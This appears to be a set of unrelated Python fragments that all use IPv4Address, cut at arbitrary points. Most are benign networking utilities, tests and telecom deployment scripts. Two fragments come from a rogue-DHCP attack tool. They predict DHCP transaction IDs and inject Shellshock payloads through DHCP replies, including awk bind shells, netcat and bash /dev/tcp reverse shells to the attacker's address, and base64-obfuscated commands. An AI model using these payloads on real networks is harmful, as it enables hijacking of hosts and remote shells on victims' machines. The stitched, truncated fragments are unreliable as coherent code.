return "B" elif bit_counter is 2: return "C" elif bit_counter is 3: return "D" elif bit_counter is 4: return "E" ######## # Main # ######## while True: try: ip = IPv4Address(input("Enter IP: ")) except AddressValueError: print("This IP is invalid\n") continue try: network = IPv4Network(str(ip) + "/" + input("Enter Subnet Mask: "), strict=False) except NetmaskValueError: print("This subnet mask is invalid\n") continue print("Network: {}".format(network[0])) print("First Host: {}".format(network[1])) print("Last Host: {}".format(network[-2])) print("Broadcast: {}".format(network[-1]))
from openvpn_status.utils import ( parse_time, parse_peer, parse_filesize, PeerAddress, FileSize) @mark.parametrize('text,time', [ ('Thu Jun 18 04:23:03 2015', datetime(2015, 6, 18, 4, 23, 3)), ('Thu Jun 18 04:08:39 2015', datetime(2015, 6, 18, 4, 8, 39)), ('Thu Jun 18 07:57:25 2015', datetime(2015, 6, 18, 7, 57, 25)), (datetime(2015, 6, 18, 7, 57, 25), datetime(2015, 6, 18, 7, 57, 25)), ]) def test_parse_time(text, time): assert parse_time(text) == time @mark.parametrize('text,peer', [ ('10.0.0.1:49502', PeerAddress(IPv4Address('10.0.0.1'), 49502)), ('10.0.0.2:64169', PeerAddress(IPv4Address('10.0.0.2'), 64169)), ('10.0.0.3:63414', PeerAddress(IPv4Address('10.0.0.3'), 63414)), (PeerAddress('10.0.0.1', 80), PeerAddress('10.0.0.1', 80)), ]) def test_parse_peer(text, peer): assert parse_peer(text) == peer assert text_type(text) == text_type(peer) @mark.parametrize('text,humanized', [ (10240, '10.2 kB'), ('10240', '10.2 kB'), (FileSize(10240), '10.2 kB'), ]) def test_parse_filesize(text, humanized):
from selfsigned import generate_selfsigned_cert from ipaddress import IPv4Address if __name__ == '__main__': from config import ssl_cn, ssl_context hostname = ssl_cn public_ip, private_ip = [IPv4Address('127.0.0.1')] * 2 files = dict() files[ssl_context[0]], files[ssl_context[1]] = generate_selfsigned_cert( hostname, public_ip, private_ip) for filename, content in files.items(): with open(filename, 'wb') as f: f.write(content)
def generate_random_ipv4(): bits = getrandbits(32) # generates an integer with 32 random bits addr = IPv4Address(bits) # instances an IPv4Address object from those bits return str(addr)
# region 3. Predict next DHCP transaction ID if technique_index == 3: # region Find free IP in local network if new_target_ip_address is None: # region Fast scan localnet with arp_scan base.print_info( 'Search for free IP addresses on the local network ...') localnet_ip_addresses = scanner.find_ip_in_local_network( listen_network_interface) # endregion index = 0 while new_target_ip_address is None: check_ip = str(IPv4Address(first_ip_address) + index) if check_ip != your_ip_address: if check_ip not in localnet_ip_addresses: new_target_ip_address = check_ip else: index += 1 else: index += 1 base.print_info('Find new IP address: ', new_target_ip_address, ' for target') # endregion # region Start Rogue DHCP server with predict next transaction ID rogue_dhcp_server_predict_trid(listen_network_interface, target_mac_address,
from link_layer import data_link from ipaddress import IPv4Address # Aqui o usuário na outra ponta do enlace recebe a mensagem que está enviada a ele, o 'l_sdu'. # Para isso, usa a primitiva da camada de enlace (data_link) que será responsável por ficar # escutando a rede e retornar os dados entregues. Por causa de adversidades na rede, alguns # quadros podem ficar comprometidos, mas isso é invisível ao usuário, sendo que a camada de enlace # deste lado comunica quando houve erros e pede o quadro novamente. Caso esteja tudo correto, comunica # que pode enviar o próximo quadro. # Para teste entre 'localhost' <--> 'localhost'. l_sdu = data_link.Data_Request(IPv4Address("127.0.0.1"), IPv4Address("127.0.0.1")) # Para teste na VM rodando 'request.py'. VM que recebe é o ip '192.168.0.100'. # l_sdu = data_link.Data_Request(IPv4Address("192.168.0.107"), IPv4Address("192.168.0.100")) # Imprime no console a mensagem recebida. print('RECEIVED:', l_sdu) # Ao final da execução, o arquivo 'request_log.csv' conterá todos os detalhes que aconteceram # na camada de enlace da interface receptora.
def main() -> None: logging.basicConfig( level=logging.INFO, format= f"%(asctime)s - %(levelname)s %(name)s %(threadName)s : - %(message)s", datefmt="%Y-%m-%dT%H:%M:%S%z", ) args = my_parser.parse_args() my_args = vars(args) quiet = my_args["quiet"] client_socket = None if my_args["socket"]: # TODO: Socket needs testing or conversion to zmq ip_port = my_args["socket"].split(":") try: ip_address = IPv4Address(ip_port[0]) except AddressValueError: ip_address = IPv6Address(ip_port[0]) port = int(ip_port[1]) client_socket = socket(AF_INET, SOCK_STREAM) open_socket(client_socket, ip_address, port) use_test_node: bool = os.getenv("USE_TEST_NODE", "False").lower() in { "true", "1", "t", } if my_args['test']: use_test_node = True if use_test_node: hive = beem.Hive(node=TEST_NODE[0]) else: hive = beem.Hive() """ do we want to see post information from podping unauthorized posts? """ if my_args["include_unauthorized"]: include_unauthorized = True else: include_unauthorized = False """ do we want to see post information from non-podping posts?? """ if my_args["include_nonpodping"]: include_non_podping = True else: include_non_podping = False """ do we want to write post information to csv? """ if my_args["write_csv"]: write_csv = True else: write_csv = False """ do we want periodic reports? """ if my_args["reports"] == 0: reports = False else: reports = True if use_test_node: logging.info("---------------> Using Test Node " + TEST_NODE[0]) else: logging.info("---------------> Using Main Hive Chain ") # scan_history will look back over the last 1 hour reporting every 15 minute chunk if my_args["old"] or my_args["block"]: report_minutes = my_args["reports"] if my_args["block"]: block_num = my_args["block"] scan_history(hive, block_num=block_num, report_freq=report_minutes, reports=reports, quiet=quiet, include_unauthorized=include_unauthorized, include_non_podping=include_non_podping, write_csv=write_csv) else: hours_ago = timedelta(hours=my_args["old"]) scan_history(hive, hours_ago=hours_ago, report_freq=report_minutes, reports=reports, quiet=quiet, include_unauthorized=include_unauthorized, include_non_podping=include_non_podping, write_csv=write_csv) history_only = my_args["history_only"] if not history_only: # scan_live will resume live scanning the chain and report every 5 minutes or # when a notification arrives scan_live(hive, my_args["reports"], reports, quiet=quiet, client_socket=client_socket, include_unauthorized=include_unauthorized, include_non_podping=include_non_podping, write_csv=write_csv) else: logging.info("history_only is set. existing")
def configure_mme(): # ====== Install MME ===================================================== # For a documentation of the installation procedure, see: # https://github.com/OPENAIRINTERFACE/openair-cn/wiki/OpenAirSoftwareSupport#install-mme gitDirectory = 'openair-cn' hssS6a_IPv4Address = IPv4Address(action_get('hss-S6a-address')) mmeS1C_IPv4Interface = IPv4Interface(action_get('mme-S1C-ipv4-interface')) mmeS11_IPv4Interface = IPv4Interface(action_get('mme-S11-ipv4-interface')) mmeS10_IPv4Interface = IPv4Interface('192.168.10.110/24') spwgcS11_IPv4Interface = IPv4Interface( action_get('spgwc-S11-ipv4-interface')) networkRealm = action_get('network-realm') networkMCC = int(action_get('network-mcc')) networkMNC = int(action_get('network-mnc')) networkOP = action_get('network-op') networkK = action_get('network-k') networkIMSIFirst = action_get('network-imsi-first') networkMSISDNFirst = action_get('network-msisdn-first') networkUsers = int(action_get('network-users')) TAC_SGW_TEST = 7 TAC_SGW_0 = 600 TAC_MME_0 = 601 TAC_MME_1 = 602 tac_sgw_test = '{:04x}'.format(TAC_SGW_TEST) tac_sgw_0 = '{:04x}'.format(TAC_SGW_0) tac_mme_0 = '{:04x}'.format(TAC_MME_0) tac_mme_1 = '{:04x}'.format(TAC_MME_1) # Prepare network configurations: mmeS6a_IfName = 'ens4' mmeS11_IfName = 'ens5' mmeS1C_IfName = 'ens6' mmeS10_IfName = 'dummy0:m10' # NOTE: # Double escaping is required for \ and " in "command" string! # 1. Python # 2. bash -c "<command>" # That is: $ => \$ ; \ => \\ ; " => \\\" commands = """\ echo \\\"###### Building MME ####################################################\\\" && \\ export MAKEFLAGS=\\\"-j`nproc`\\\" && \\ cd /home/nornetpp/src && \\ cd {gitDirectory} && \\ cd scripts && \\ mkdir -p logs && \\ echo \\\"====== Building dependencies ... ======\\\" && \\ ./build_mme --check-installed-software --force >logs/build_mme-1.log 2>&1 && \\ echo \\\"====== Building service ... ======\\\" && \\ ./build_mme --clean >logs/build_mme-2.log 2>&1 && \\ echo \\\"###### Creating MME configuration files ###############################\\\" && \\ echo \\\"127.0.1.1 mme.{networkRealm} mme\\\" | sudo tee -a /etc/hosts && \\ echo \\\"{hssS6a_IPv4Address} hss.{networkRealm} hss\\\" | sudo tee -a /etc/hosts && \\ openssl rand -out \$HOME/.rnd 128 && \\ INSTANCE=1 && \\ PREFIX='/usr/local/etc/oai' && \\ sudo mkdir -m 0777 -p \$PREFIX && \\ sudo mkdir -m 0777 -p \$PREFIX/freeDiameter && \\ sudo cp ../etc/mme_fd.sprint.conf \$PREFIX/freeDiameter/mme_fd.conf && \\ sudo cp ../etc/mme.conf \$PREFIX && \\ declare -A MME_CONF && \\ MME_CONF[@MME_S6A_IP_ADDR@]=\\\"127.0.0.11\\\" && \\ MME_CONF[@INSTANCE@]=\$INSTANCE && \\ MME_CONF[@PREFIX@]=\$PREFIX && \\ MME_CONF[@REALM@]='{networkRealm}' && \\ MME_CONF[@PID_DIRECTORY@]='/var/run' && \\ MME_CONF[@MME_FQDN@]=\\\"mme.{networkRealm}\\\" && \\ MME_CONF[@HSS_HOSTNAME@]='hss' && \\ MME_CONF[@HSS_FQDN@]=\\\"hss.{networkRealm}\\\" && \\ MME_CONF[@HSS_IP_ADDR@]='{hssS6a_IPv4Address}' && \\ MME_CONF[@MCC@]='{networkMCC}' && \\ MME_CONF[@MNC@]='{networkMNC}' && \\ MME_CONF[@MME_GID@]='32768' && \\ MME_CONF[@MME_CODE@]='3' && \\ MME_CONF[@TAC_0@]='600' && \\ MME_CONF[@TAC_1@]='601' && \\ MME_CONF[@TAC_2@]='602' && \\ MME_CONF[@MME_INTERFACE_NAME_FOR_S1_MME@]='{mmeS1C_IfName}' && \\ MME_CONF[@MME_IPV4_ADDRESS_FOR_S1_MME@]='{mmeS1C_IPv4Interface}' && \\ MME_CONF[@MME_INTERFACE_NAME_FOR_S11@]='{mmeS11_IfName}' && \\ MME_CONF[@MME_IPV4_ADDRESS_FOR_S11@]='{mmeS11_IPv4Interface}' && \\ MME_CONF[@MME_INTERFACE_NAME_FOR_S10@]='{mmeS10_IfName}' && \\ MME_CONF[@MME_IPV4_ADDRESS_FOR_S10@]='{mmeS10_IPv4Interface}' && \\ MME_CONF[@OUTPUT@]='CONSOLE' && \\ MME_CONF[@SGW_IPV4_ADDRESS_FOR_S11_TEST_0@]='{spwgcS11_IPv4Interface}' && \\ MME_CONF[@SGW_IPV4_ADDRESS_FOR_S11_0@]='{spwgcS11_IPv4Interface}' && \\ MME_CONF[@PEER_MME_IPV4_ADDRESS_FOR_S10_0@]='0.0.0.0/24' && \\ MME_CONF[@PEER_MME_IPV4_ADDRESS_FOR_S10_1@]='0.0.0.0/24' && \\ MME_CONF[@TAC-LB_SGW_TEST_0@]={tac_sgw_test_lo} && \\ MME_CONF[@TAC-HB_SGW_TEST_0@]={tac_sgw_test_hi} && \\ MME_CONF[@MCC_SGW_0@]={networkMCC} && \\ MME_CONF[@MNC3_SGW_0@]={networkMNC:03d} && \\ MME_CONF[@TAC-LB_SGW_0@]={tac_sgw_0_lo} && \\ MME_CONF[@TAC-HB_SGW_0@]={tac_sgw_0_hi} && \\ MME_CONF[@MCC_MME_0@]={networkMCC} && \\ MME_CONF[@MNC3_MME_0@]={networkMNC:03d} && \\ MME_CONF[@TAC-LB_MME_0@]={tac_mme_0_lo} && \\ MME_CONF[@TAC-HB_MME_0@]={tac_mme_0_hi} && \\ MME_CONF[@MCC_MME_1@]={networkMCC} && \\ MME_CONF[@MNC3_MME_1@]={networkMNC:03d} && \\ MME_CONF[@TAC-LB_MME_1@]={tac_mme_1_lo} && \\ MME_CONF[@TAC-HB_MME_1@]={tac_mme_1_hi} && \\ for K in \\\"\${{!MME_CONF[@]}}\\\"; do sudo egrep -lRZ \\\"\$K\\\" \$PREFIX | xargs -0 -l sudo sed -i -e \\\"s|\$K|\${{MME_CONF[\$K]}}|g\\\" ; ret=\$?;[[ ret -ne 0 ]] && echo \\\"Tried to replace \$K with \${{MME_CONF[\$K]}}\\\" || true ; done && \\ sudo ./check_mme_s6a_certificate \$PREFIX/freeDiameter mme.{networkRealm} >logs/check_mme_s6a_certificate.log 2>&1 && \\ echo \\\"====== Preparing SystemD Unit ... ======\\\" && \\ ( echo \\\"[Unit]\\\" && \\ echo \\\"Description=Mobility Management Entity (MME)\\\" && \\ echo \\\"After=ssh.target\\\" && \\ echo \\\"\\\" && \\ echo \\\"[Service]\\\" && \\ echo \\\"ExecStart=/bin/sh -c \\\'exec /usr/local/bin/mme -c /usr/local/etc/oai/mme.conf >>/var/log/mme.log 2>&1\\\'\\\" && \\ echo \\\"KillMode=process\\\" && \\ echo \\\"Restart=on-failure\\\" && \\ echo \\\"RestartPreventExitStatus=255\\\" && \\ echo \\\"WorkingDirectory=/home/nornetpp/src/openair-cn/scripts\\\" && \\ echo \\\"\\\" && \\ echo \\\"[Install]\\\" && \\ echo \\\"WantedBy=multi-user.target\\\" ) | sudo tee /lib/systemd/system/mme.service && \\ sudo systemctl daemon-reload && \\ echo \\\"###### Installing sysstat #############################################\\\" && \\ DEBIAN_FRONTEND=noninteractive sudo apt install -y -o Dpkg::Options::=--force-confold -o Dpkg::Options::=--force-confdef --no-install-recommends sysstat && \\ sudo sed -e \\\"s/^ENABLED=.*$/ENABLED=\\\\\\"true\\\\\\"/g\\\" -i /etc/default/sysstat && \\ sudo sed -e \\\"s/^SADC_OPTIONS=.*$/SADC_OPTIONS=\\\\\\"-S ALL\\\\\\"/g\\\" -i /etc/sysstat/sysstat && \\ sudo service sysstat restart && \\ echo \\\"###### Done! ##########################################################\\\"""".format( gitDirectory=gitDirectory, hssS6a_IPv4Address=hssS6a_IPv4Address, mmeS1C_IfName=mmeS1C_IfName, mmeS1C_IPv4Interface=mmeS1C_IPv4Interface, mmeS11_IfName=mmeS11_IfName, mmeS11_IPv4Interface=mmeS11_IPv4Interface, mmeS10_IfName=mmeS10_IfName, mmeS10_IPv4Interface=mmeS10_IPv4Interface, spwgcS11_IPv4Interface=spwgcS11_IPv4Interface, networkRealm=networkRealm, networkMCC=networkMCC, networkMNC=networkMNC, networkOP=networkOP, networkK=networkK, networkIMSIFirst=networkIMSIFirst, networkMSISDNFirst=networkMSISDNFirst, networkUsers=networkUsers, tac_sgw_test_hi=tac_sgw_test[0:2], tac_sgw_test_lo=tac_sgw_test[2:4], tac_sgw_0_hi=tac_sgw_0[0:2], tac_sgw_0_lo=tac_sgw_0[2:4], tac_mme_0_hi=tac_mme_0[0:2], tac_mme_0_lo=tac_mme_0[2:4], tac_mme_1_hi=tac_mme_1[0:2], tac_mme_1_lo=tac_mme_1[2:4]) runShellCommands(commands, 'configure_mme: configuring MME', 'actions.configure-mme', 'mmecharm.configured-mme')
def sort_networks(networks): return sorted(networks, key=lambda n: IPv4Address(n.prefix))
def convert(self, value: str) -> Union[str, None]: try: ip = IPv4Address(value) return str(ip) except AddressValueError: return None
from datetime import timedelta from ipaddress import IPv4Address LIMITING_REQ_N = 100 LIMITING_PERIOD = timedelta(minutes=2) IP_MASK = IPv4Address("255.255.255.0")
def ip_v4_address_validator(v: Any) -> IPv4Address: if isinstance(v, IPv4Address): return v with change_exception(errors.IPv4AddressError, ValueError): return IPv4Address(v)
def ipv4_is_defined(address): """ The function for checking if an IPv4 address is defined (does not need to be resolved). Args: address: An IPv4 address in string format. Returns: Tuple: :Boolean: True if given address is defined, otherwise False :String: IETF assignment name if given address is defined, otherwise '' :String: IETF assignment RFC if given address is defined, otherwise '' """ # Initialize the IP address object. query_ip = IPv4Address(str(address)) # This Network if query_ip in IPv4Network('0.0.0.0/8'): return True, 'This Network', 'RFC 1122, Section 3.2.1.3' # Loopback elif query_ip.is_loopback: return True, 'Loopback', 'RFC 1122, Section 3.2.1.3' # Link Local elif query_ip.is_link_local: return True, 'Link Local', 'RFC 3927' # IETF Protocol Assignments elif query_ip in IPv4Network('192.0.0.0/24'): return True, 'IETF Protocol Assignments', 'RFC 5736' # TEST-NET-1 elif query_ip in IPv4Network('192.0.2.0/24'): return True, 'TEST-NET-1', 'RFC 5737' # 6to4 Relay Anycast elif query_ip in IPv4Network('192.88.99.0/24'): return True, '6to4 Relay Anycast', 'RFC 3068' # Network Interconnect Device Benchmark Testing elif query_ip in IPv4Network('198.18.0.0/15'): return (True, 'Network Interconnect Device Benchmark Testing', 'RFC 2544') # TEST-NET-2 elif query_ip in IPv4Network('198.51.100.0/24'): return True, 'TEST-NET-2', 'RFC 5737' # TEST-NET-3 elif query_ip in IPv4Network('203.0.113.0/24'): return True, 'TEST-NET-3', 'RFC 5737' # Multicast elif query_ip.is_multicast: return True, 'Multicast', 'RFC 3171' # Limited Broadcast elif query_ip in IPv4Network('255.255.255.255/32'): return True, 'Limited Broadcast', 'RFC 919, Section 7' # Private-Use Networks elif query_ip.is_private: return True, 'Private-Use Networks', 'RFC 1918' return False, '', ''
def api_createtracker(self, fname, fsize, descrip, md5, ip, port): """Implements the createtracker API command. All arguments are expected to be strings, but *fsize* and *port* should be castable to :class:`int` and *ip* should be castable to :class:`~ipaddress.IPv4Address`. """ fname, descrip, md5 = map(str, (fname, descrip, md5)) try: fsize, port = int(fsize), int(port) except ValueError: print("Either fsize ({!r}) or port ({!r}) is not a valid " \ "integer".format(fsize,port)) self.request.sendall(b"<createtracker fail>") return try: ip = IPv4Address(ip) except AddressValueError: print("Malformed IP Address: {!r}".format(ip)) self.request.sendall(b"<createtracker fail>") return tfname = "{}.track".format(fname) tfpath = os.path.join(self.server.torrents_dir, tfname) #check if .track file already exists if os.path.exists(tfpath): print("Couldn't create tracker, already exists.") self.request.sendall(b"<createtracker ferr>") return #create a new trackerfile try: tf = trackerfile.trackerfile(fname, fsize, descrip, md5) except Exception as err: print(err) self.request.sendall(b"<createtracker fail>") return print("Created new trackerfile instance for fname={!r}".format(fname)) #add creator as peer try: tf.updatePeer(ip, port, 0, fsize - 1) except Exception as err: print(err) self.request.sendall(b"<createtracker fail>") return print("Added {} (creator) to trackerfile".format(ip)) #write tracker to file with open(tfpath, 'w') as fl: fcntl.lockf(fl, fcntl.LOCK_EX) tf.writeTo(fl) fcntl.lockf(fl, fcntl.LOCK_UN) print("Wrote trackerfile to disk.") self.request.sendall(b"<createtracker succ>") return
A: 1-127 B: 128-191 C: 192-223 D: 224-239 """ from ipaddress import IPv4Address ipv4_addr = False while not ipv4_addr: address = input("Введите IP адрес в десятично-точечном формате: ") try: ipv4_addr = IPv4Address(address) except ValueError: print('Incorrect IPv4 address.') first = int(str(ipv4_addr).split('.')[0]) if ipv4_addr.is_multicast: print('multicast') elif str(ipv4_addr) == '255.255.255.255': print('local broadcast') elif str(ipv4_addr) == '0.0.0.0': print('unassigned') elif first >= 0 and first < 224: print('unicast') else: print('unused')
def prepare_mme_build(): # ====== Install MME ===================================================== # For a documentation of the installation procedure, see: # https://github.com/OPENAIRINTERFACE/openair-cn/wiki/OpenAirSoftwareSupport#install-mme gitRepository = action_get('mme-git-repository') gitCommit = action_get('mme-git-commit') gitDirectory = 'openair-cn' mmeS1C_IPv4Interface = IPv4Interface(action_get('mme-S1C-ipv4-interface')) mmeS1C_IPv4Gateway = IPv4Address(action_get('mme-S1C-ipv4-gateway')) if action_get('mme-S1C-ipv6-interface') != '': mmeS1C_IPv6Interface = IPv6Interface( action_get('mme-S1C-ipv6-interface')) else: mmeS1C_IPv6Interface = None if action_get('mme-S1C-ipv6-gateway') != '': mmeS1C_IPv6Gateway = IPv6Address(action_get('mme-S1C-ipv6-gateway')) else: mmeS1C_IPv6Gateway = None # Prepare network configurations: mmeS6a_IfName = 'ens4' mmeS11_IfName = 'ens5' mmeS1C_IfName = 'ens6' configurationS6a = configureInterface(mmeS6a_IfName, IPv4Interface('0.0.0.0/0')) configurationS11 = configureInterface(mmeS11_IfName, IPv4Interface('0.0.0.0/0')) configurationS1C = configureInterface(mmeS1C_IfName, mmeS1C_IPv4Interface, mmeS1C_IPv4Gateway, mmeS1C_IPv6Interface, mmeS1C_IPv6Gateway) # S10 dummy interface: mmeS10_IfName = 'dummy0:m10' configurationS10 = configureInterface(mmeS10_IfName, IPv4Interface('192.168.10.110/24')) # NOTE: # Double escaping is required for \ and " in "command" string! # 1. Python # 2. bash -c "<command>" # That is: $ => \$ ; \ => \\ ; " => \\\" commands = """\ echo \\\"###### Preparing system ###############################################\\\" && \\ echo -e \\\"{configurationS6a}\\\" | sudo tee /etc/network/interfaces.d/61-{mmeS6a_IfName} && sudo ifup {mmeS6a_IfName} || true && \\ echo -e \\\"{configurationS11}\\\" | sudo tee /etc/network/interfaces.d/62-{mmeS11_IfName} && sudo ifup {mmeS11_IfName} || true && \\ echo -e \\\"{configurationS1C}\\\" | sudo tee /etc/network/interfaces.d/63-{mmeS1C_IfName} && sudo ifup {mmeS1C_IfName} || true && \\ sudo ip link add dummy0 type dummy || true && \\ echo -e \\\"{configurationS10}\\\" | sudo tee /etc/network/interfaces.d/64-{mmeS10_IfName} && sudo ifup {mmeS10_IfName} || true && \\ echo \\\"###### Preparing sources ##############################################\\\" && \\ cd /home/nornetpp/src && \\ if [ ! -d \\\"{gitDirectory}\\\" ] ; then git clone --quiet {gitRepository} {gitDirectory} && cd {gitDirectory} ; else cd {gitDirectory} && git pull ; fi && \\ git checkout {gitCommit} && \\ cd scripts && \\ echo \\\"###### Done! ##########################################################\\\"""".format( gitRepository=gitRepository, gitDirectory=gitDirectory, gitCommit=gitCommit, mmeS6a_IfName=mmeS6a_IfName, mmeS11_IfName=mmeS11_IfName, mmeS1C_IfName=mmeS1C_IfName, mmeS10_IfName=mmeS10_IfName, configurationS6a=configurationS6a, configurationS11=configurationS11, configurationS1C=configurationS1C, configurationS10=configurationS10) runShellCommands(commands, 'prepare_mme_build: preparing MME build', 'actions.prepare-mme-build', 'mmecharm.prepared-mme-build')
def dhcp_reply(request): global offer_ip_address global target_mac_address global target_ip_address global requested_ip_address global transaction_id_global global number_of_dhcp_request global shellshock_url global domain global your_mac_address global current_network_interface global arp_req_router global arp_req_your_ip global possible_output global router_ip_address global tm global is_new_connection SOCK = socket(AF_PACKET, SOCK_RAW) SOCK.bind((current_network_interface, 0)) if request.haslayer(DHCP): domain = bytes(args.domain) offer_ip_address = args.first_offer_ip transaction_id = request[BOOTP].xid target_mac_address = ":".join("{:02x}".format(ord(c)) for c in request[BOOTP].chaddr[0:6]) if request[DHCP].options[0][1] == 1: is_new_connection = True print Base.c_info + "DHCP DISCOVER from: " + target_mac_address + " transaction id: " + hex( transaction_id) if args.new: if target_ip_address is not None: requested_ip = target_ip_address else: requested_ip = offer_ip_address for option in request[DHCP].options: if option[0] == "requested_addr": requested_ip = str(option[1]) transaction_id_global = transaction_id requested_ip_address = requested_ip tm.add_task(ack_sender) if target_ip_address is not None: offer_ip_address = target_ip_address else: next_offer_ip_address = IPv4Address( unicode(args.first_offer_ip)) + number_of_dhcp_request if IPv4Address(next_offer_ip_address) < IPv4Address( unicode(args.last_offer_ip)): number_of_dhcp_request += 1 offer_ip_address = str(next_offer_ip_address) else: number_of_dhcp_request = 0 offer_ip_address = args.first_offer_ip offer_packet = make_dhcp_offer_packet(transaction_id) SOCK.send(offer_packet) print Base.c_info + "Send offer response!" if request[DHCP].options[0][1] == 8: ciaddr = request[BOOTP].ciaddr giaddr = request[BOOTP].giaddr chaddr = request[BOOTP].chaddr flags = request[BOOTP].flags print Base.c_info + "DHCP INFORM from: " + target_mac_address + " transaction id: " + hex(transaction_id) + \ " client ip: " + ciaddr option_operation = pack("!3B", 53, 1, 5) # DHCPACK operation option_netmask = pack("!" "2B" "4s", 1, 4, inet_aton(network_mask)) domain = pack("!%ds" % (len(domain)), domain) option_domain = pack("!2B", 15, len(domain)) + domain option_router = pack("!" "2B" "4s", 3, 4, inet_aton(router_ip_address)) option_dns = pack("!" "2B" "4s", 6, 4, inet_aton(dns_server_ip_address)) option_server_id = pack( "!" "2B" "4s", 54, 4, inet_aton(dhcp_server_ip_address)) # Set server id option_end = pack("B", 255) dhcp_options = option_operation + option_server_id + option_netmask + option_domain + option_router + \ option_dns + option_end dhcp = DHCP_raw() ack_packet = dhcp.make_packet( ethernet_src_mac=dhcp_server_mac_address, ethernet_dst_mac=target_mac_address, ip_src=dhcp_server_ip_address, ip_dst=ciaddr, udp_src_port=67, udp_dst_port=68, bootp_message_type=2, bootp_transaction_id=transaction_id, bootp_flags=int(flags), bootp_client_ip=ciaddr, bootp_your_client_ip="0.0.0.0", bootp_next_server_ip="0.0.0.0", bootp_relay_agent_ip=giaddr, bootp_client_hw_address=target_mac_address, dhcp_options=dhcp_options, padding=18) SOCK.send(ack_packet) print Base.c_info + "Send inform ack response!" if request[DHCP].options[0][1] == 3: dhcpnak = False requested_ip = offer_ip_address for option in request[DHCP].options: if option[0] == "requested_addr": requested_ip = str(option[1]) print Base.c_info + "DHCP REQUEST from: " + target_mac_address + " transaction id: " + \ hex(transaction_id) + " requested ip: " + requested_ip if args.cisco: ack_packet = make_dhcp_ack_packet(transaction_id, requested_ip, "ff:ff:ff:ff:ff:ff", "255.255.255.255") SOCK.send(ack_packet) print Base.c_info + "Send ack response to Cisco device: " + target_mac_address else: if args.apple: ack_packet = make_dhcp_ack_packet(transaction_id, requested_ip) SOCK.send(ack_packet) print Base.c_info + "Send ack response Apple device: " + target_mac_address else: if target_ip_address is not None: if requested_ip != target_ip_address: nak_packet = make_dhcp_nak_packet( transaction_id, requested_ip) SOCK.send(nak_packet) print Base.c_info + "Send nak response!" dhcpnak = True else: if IPv4Address(unicode(requested_ip)) < IPv4Address(unicode(args.first_offer_ip)) \ or IPv4Address(unicode(requested_ip)) > IPv4Address(unicode(args.last_offer_ip)): nak_packet = make_dhcp_nak_packet( transaction_id, requested_ip) SOCK.send(nak_packet) print Base.c_info + "Send nak response!" dhcpnak = True if not dhcpnak: net_settings = args.ip_path + "ip addr add " + requested_ip + \ "/" + str(IPAddress(network_mask).netmask_bits()) + " dev " + args.iface_name + ";" global payload if args.shellshock_command is not None: payload = args.shellshock_command if args.bind_shell: payload = "awk 'BEGIN{s=\"/inet/tcp/" + str(args.bind_port) + \ "/0/0\";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}' &" if args.nc_reverse_shell: payload = "rm /tmp/f 2>/dev/null;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc " + \ your_ip_address + " " + str(args.reverse_port) + " >/tmp/f &" if args.nce_reverse_shell: payload = "/bin/nc -e /bin/sh " + your_ip_address + " " + str( args.reverse_port) + " 2>&1 &" if args.bash_reverse_shell: payload = "/bin/bash -i >& /dev/tcp/" + your_ip_address + \ "/" + str(args.reverse_port) + " 0>&1 &" if payload is not None: if not args.without_network: payload = net_settings + payload if args.without_base64: shellshock_url = "() { :" + "; }; " + payload else: payload = b64encode(payload) shellshock_url = "() { :" + "; }; /bin/sh <(/usr/bin/base64 -d <<< " + payload + ")" if shellshock_url is not None: if len(shellshock_url) > 255: print Base.c_error + "Len of command is very big! Current len: " + str( len(shellshock_url)) shellshock_url = "A" global proxy if args.proxy is None: proxy = bytes("http://" + dhcp_server_ip_address + ":8080/wpad.dat") else: proxy = bytes(args.proxy) ack_packet = make_dhcp_ack_packet( transaction_id, requested_ip) SOCK.send(ack_packet) print Base.c_info + "Send ack response!" if request[DHCP].options[0][1] == 4: is_new_connection = True print Base.c_info + "DHCP DECLINE from: " + target_mac_address + " transaction id: " + hex( transaction_id) tm.add_task(discover_sender) if request.haslayer(ARP): if target_ip_address is not None: if request[ARP].op == 1: if request[Ether].dst == "ff:ff:ff:ff:ff:ff" and request[ ARP].hwdst == "00:00:00:00:00:00": print Base.c_info + "ARP request src MAC: " + request[ ARP].hwsrc + " dst IP: " + request[ARP].pdst if request[ ARP].pdst != target_ip_address or not is_new_connection: if not args.apple: arp_reply = arp.make_response( ethernet_src_mac=your_mac_address, ethernet_dst_mac=request[ARP].hwsrc, sender_mac=your_mac_address, sender_ip=request[ARP].pdst, target_mac=request[ARP].hwsrc, target_ip=request[ARP].psrc) SOCK.send(arp_reply) print Base.c_info + "Send ARP response!" else: arp_req_your_ip = True if request[Ether].dst == "ff:ff:ff:ff:ff:ff" and request[ ARP].pdst == router_ip_address: arp_req_router = True if arp_req_router or arp_req_your_ip: if not possible_output and not args.apple and not args.cisco and not args.new: try: print Base.c_warning + "Possible MiTM! Target: " + Base.cWARNING + \ target_ip_address + " (" + target_mac_address + ")" + Base.cEND possible_output = True except: pass if arp_req_router and arp_req_your_ip: if target_mac_address is not None and target_ip_address is not None: print Base.c_success + "MiTM success! Target: " + Base.cSUCCESS + target_ip_address + \ " (" + target_mac_address + ")" + Base.cEND if not args.not_exit: SOCK.close() exit(0) SOCK.close()
def ip(self, value): try: addr = IPv4Address(value) self._ip = addr except AddressValueError: raise MeboConfigurationError(f'Value {addr} set for IP is invalid IPv4 Address')
def main(): # Process arguments and initialize TRAP interface try: args, _ = process_arguments() except SystemExit as e: args = None # Error in arguments or help message trap = pytrap.TrapCtx() try: trap.init(sys.argv, 1, 0, module_name="Backscatter classifier common TRAP help") # Allow trap to print it's own help but terminate script anyway due to error in arguments if args is None: sys.exit(PYTHON_ARGS_ERROR_EXIT) trap.setRequiredFmt(0) except Exception as e: # Trap error message print(e) sys.exit(TRAP_ARGS_ERROR_EXIT) # Logging settings logger = logging.getLogger("backscatter_classifier") logging.basicConfig( level=logging.DEBUG, filename=args.logfile, filemode='w', format= "[%(levelname)s], %(asctime)s, %(name)s, %(funcName)s, line %(lineno)d: %(message)s" ) # ASN and city databases try: geoip_db = Geoip2Wrapper(args.agp, args.cgp) except Exception as e: logger.error(e) logger.error("Error while create GeoIP2 wrapper") print(str(e), file=sys.stderr) sys.exit(EXIT_FAILURE) if args.export_to in ("c3isp", "c3isp-misp"): c3isp_upload.read_config(args.c3isp_config) if args.export_to == "misp": # MISP instance try: misp_instance = ExpandedPyMISP(args.url, args.key, args.ssl) except Exception as e: logger.error(e) logger.error("Error while creating MISP instance") print(str(e), file=sys.stderr) sys.exit(EXIT_FAILURE) # 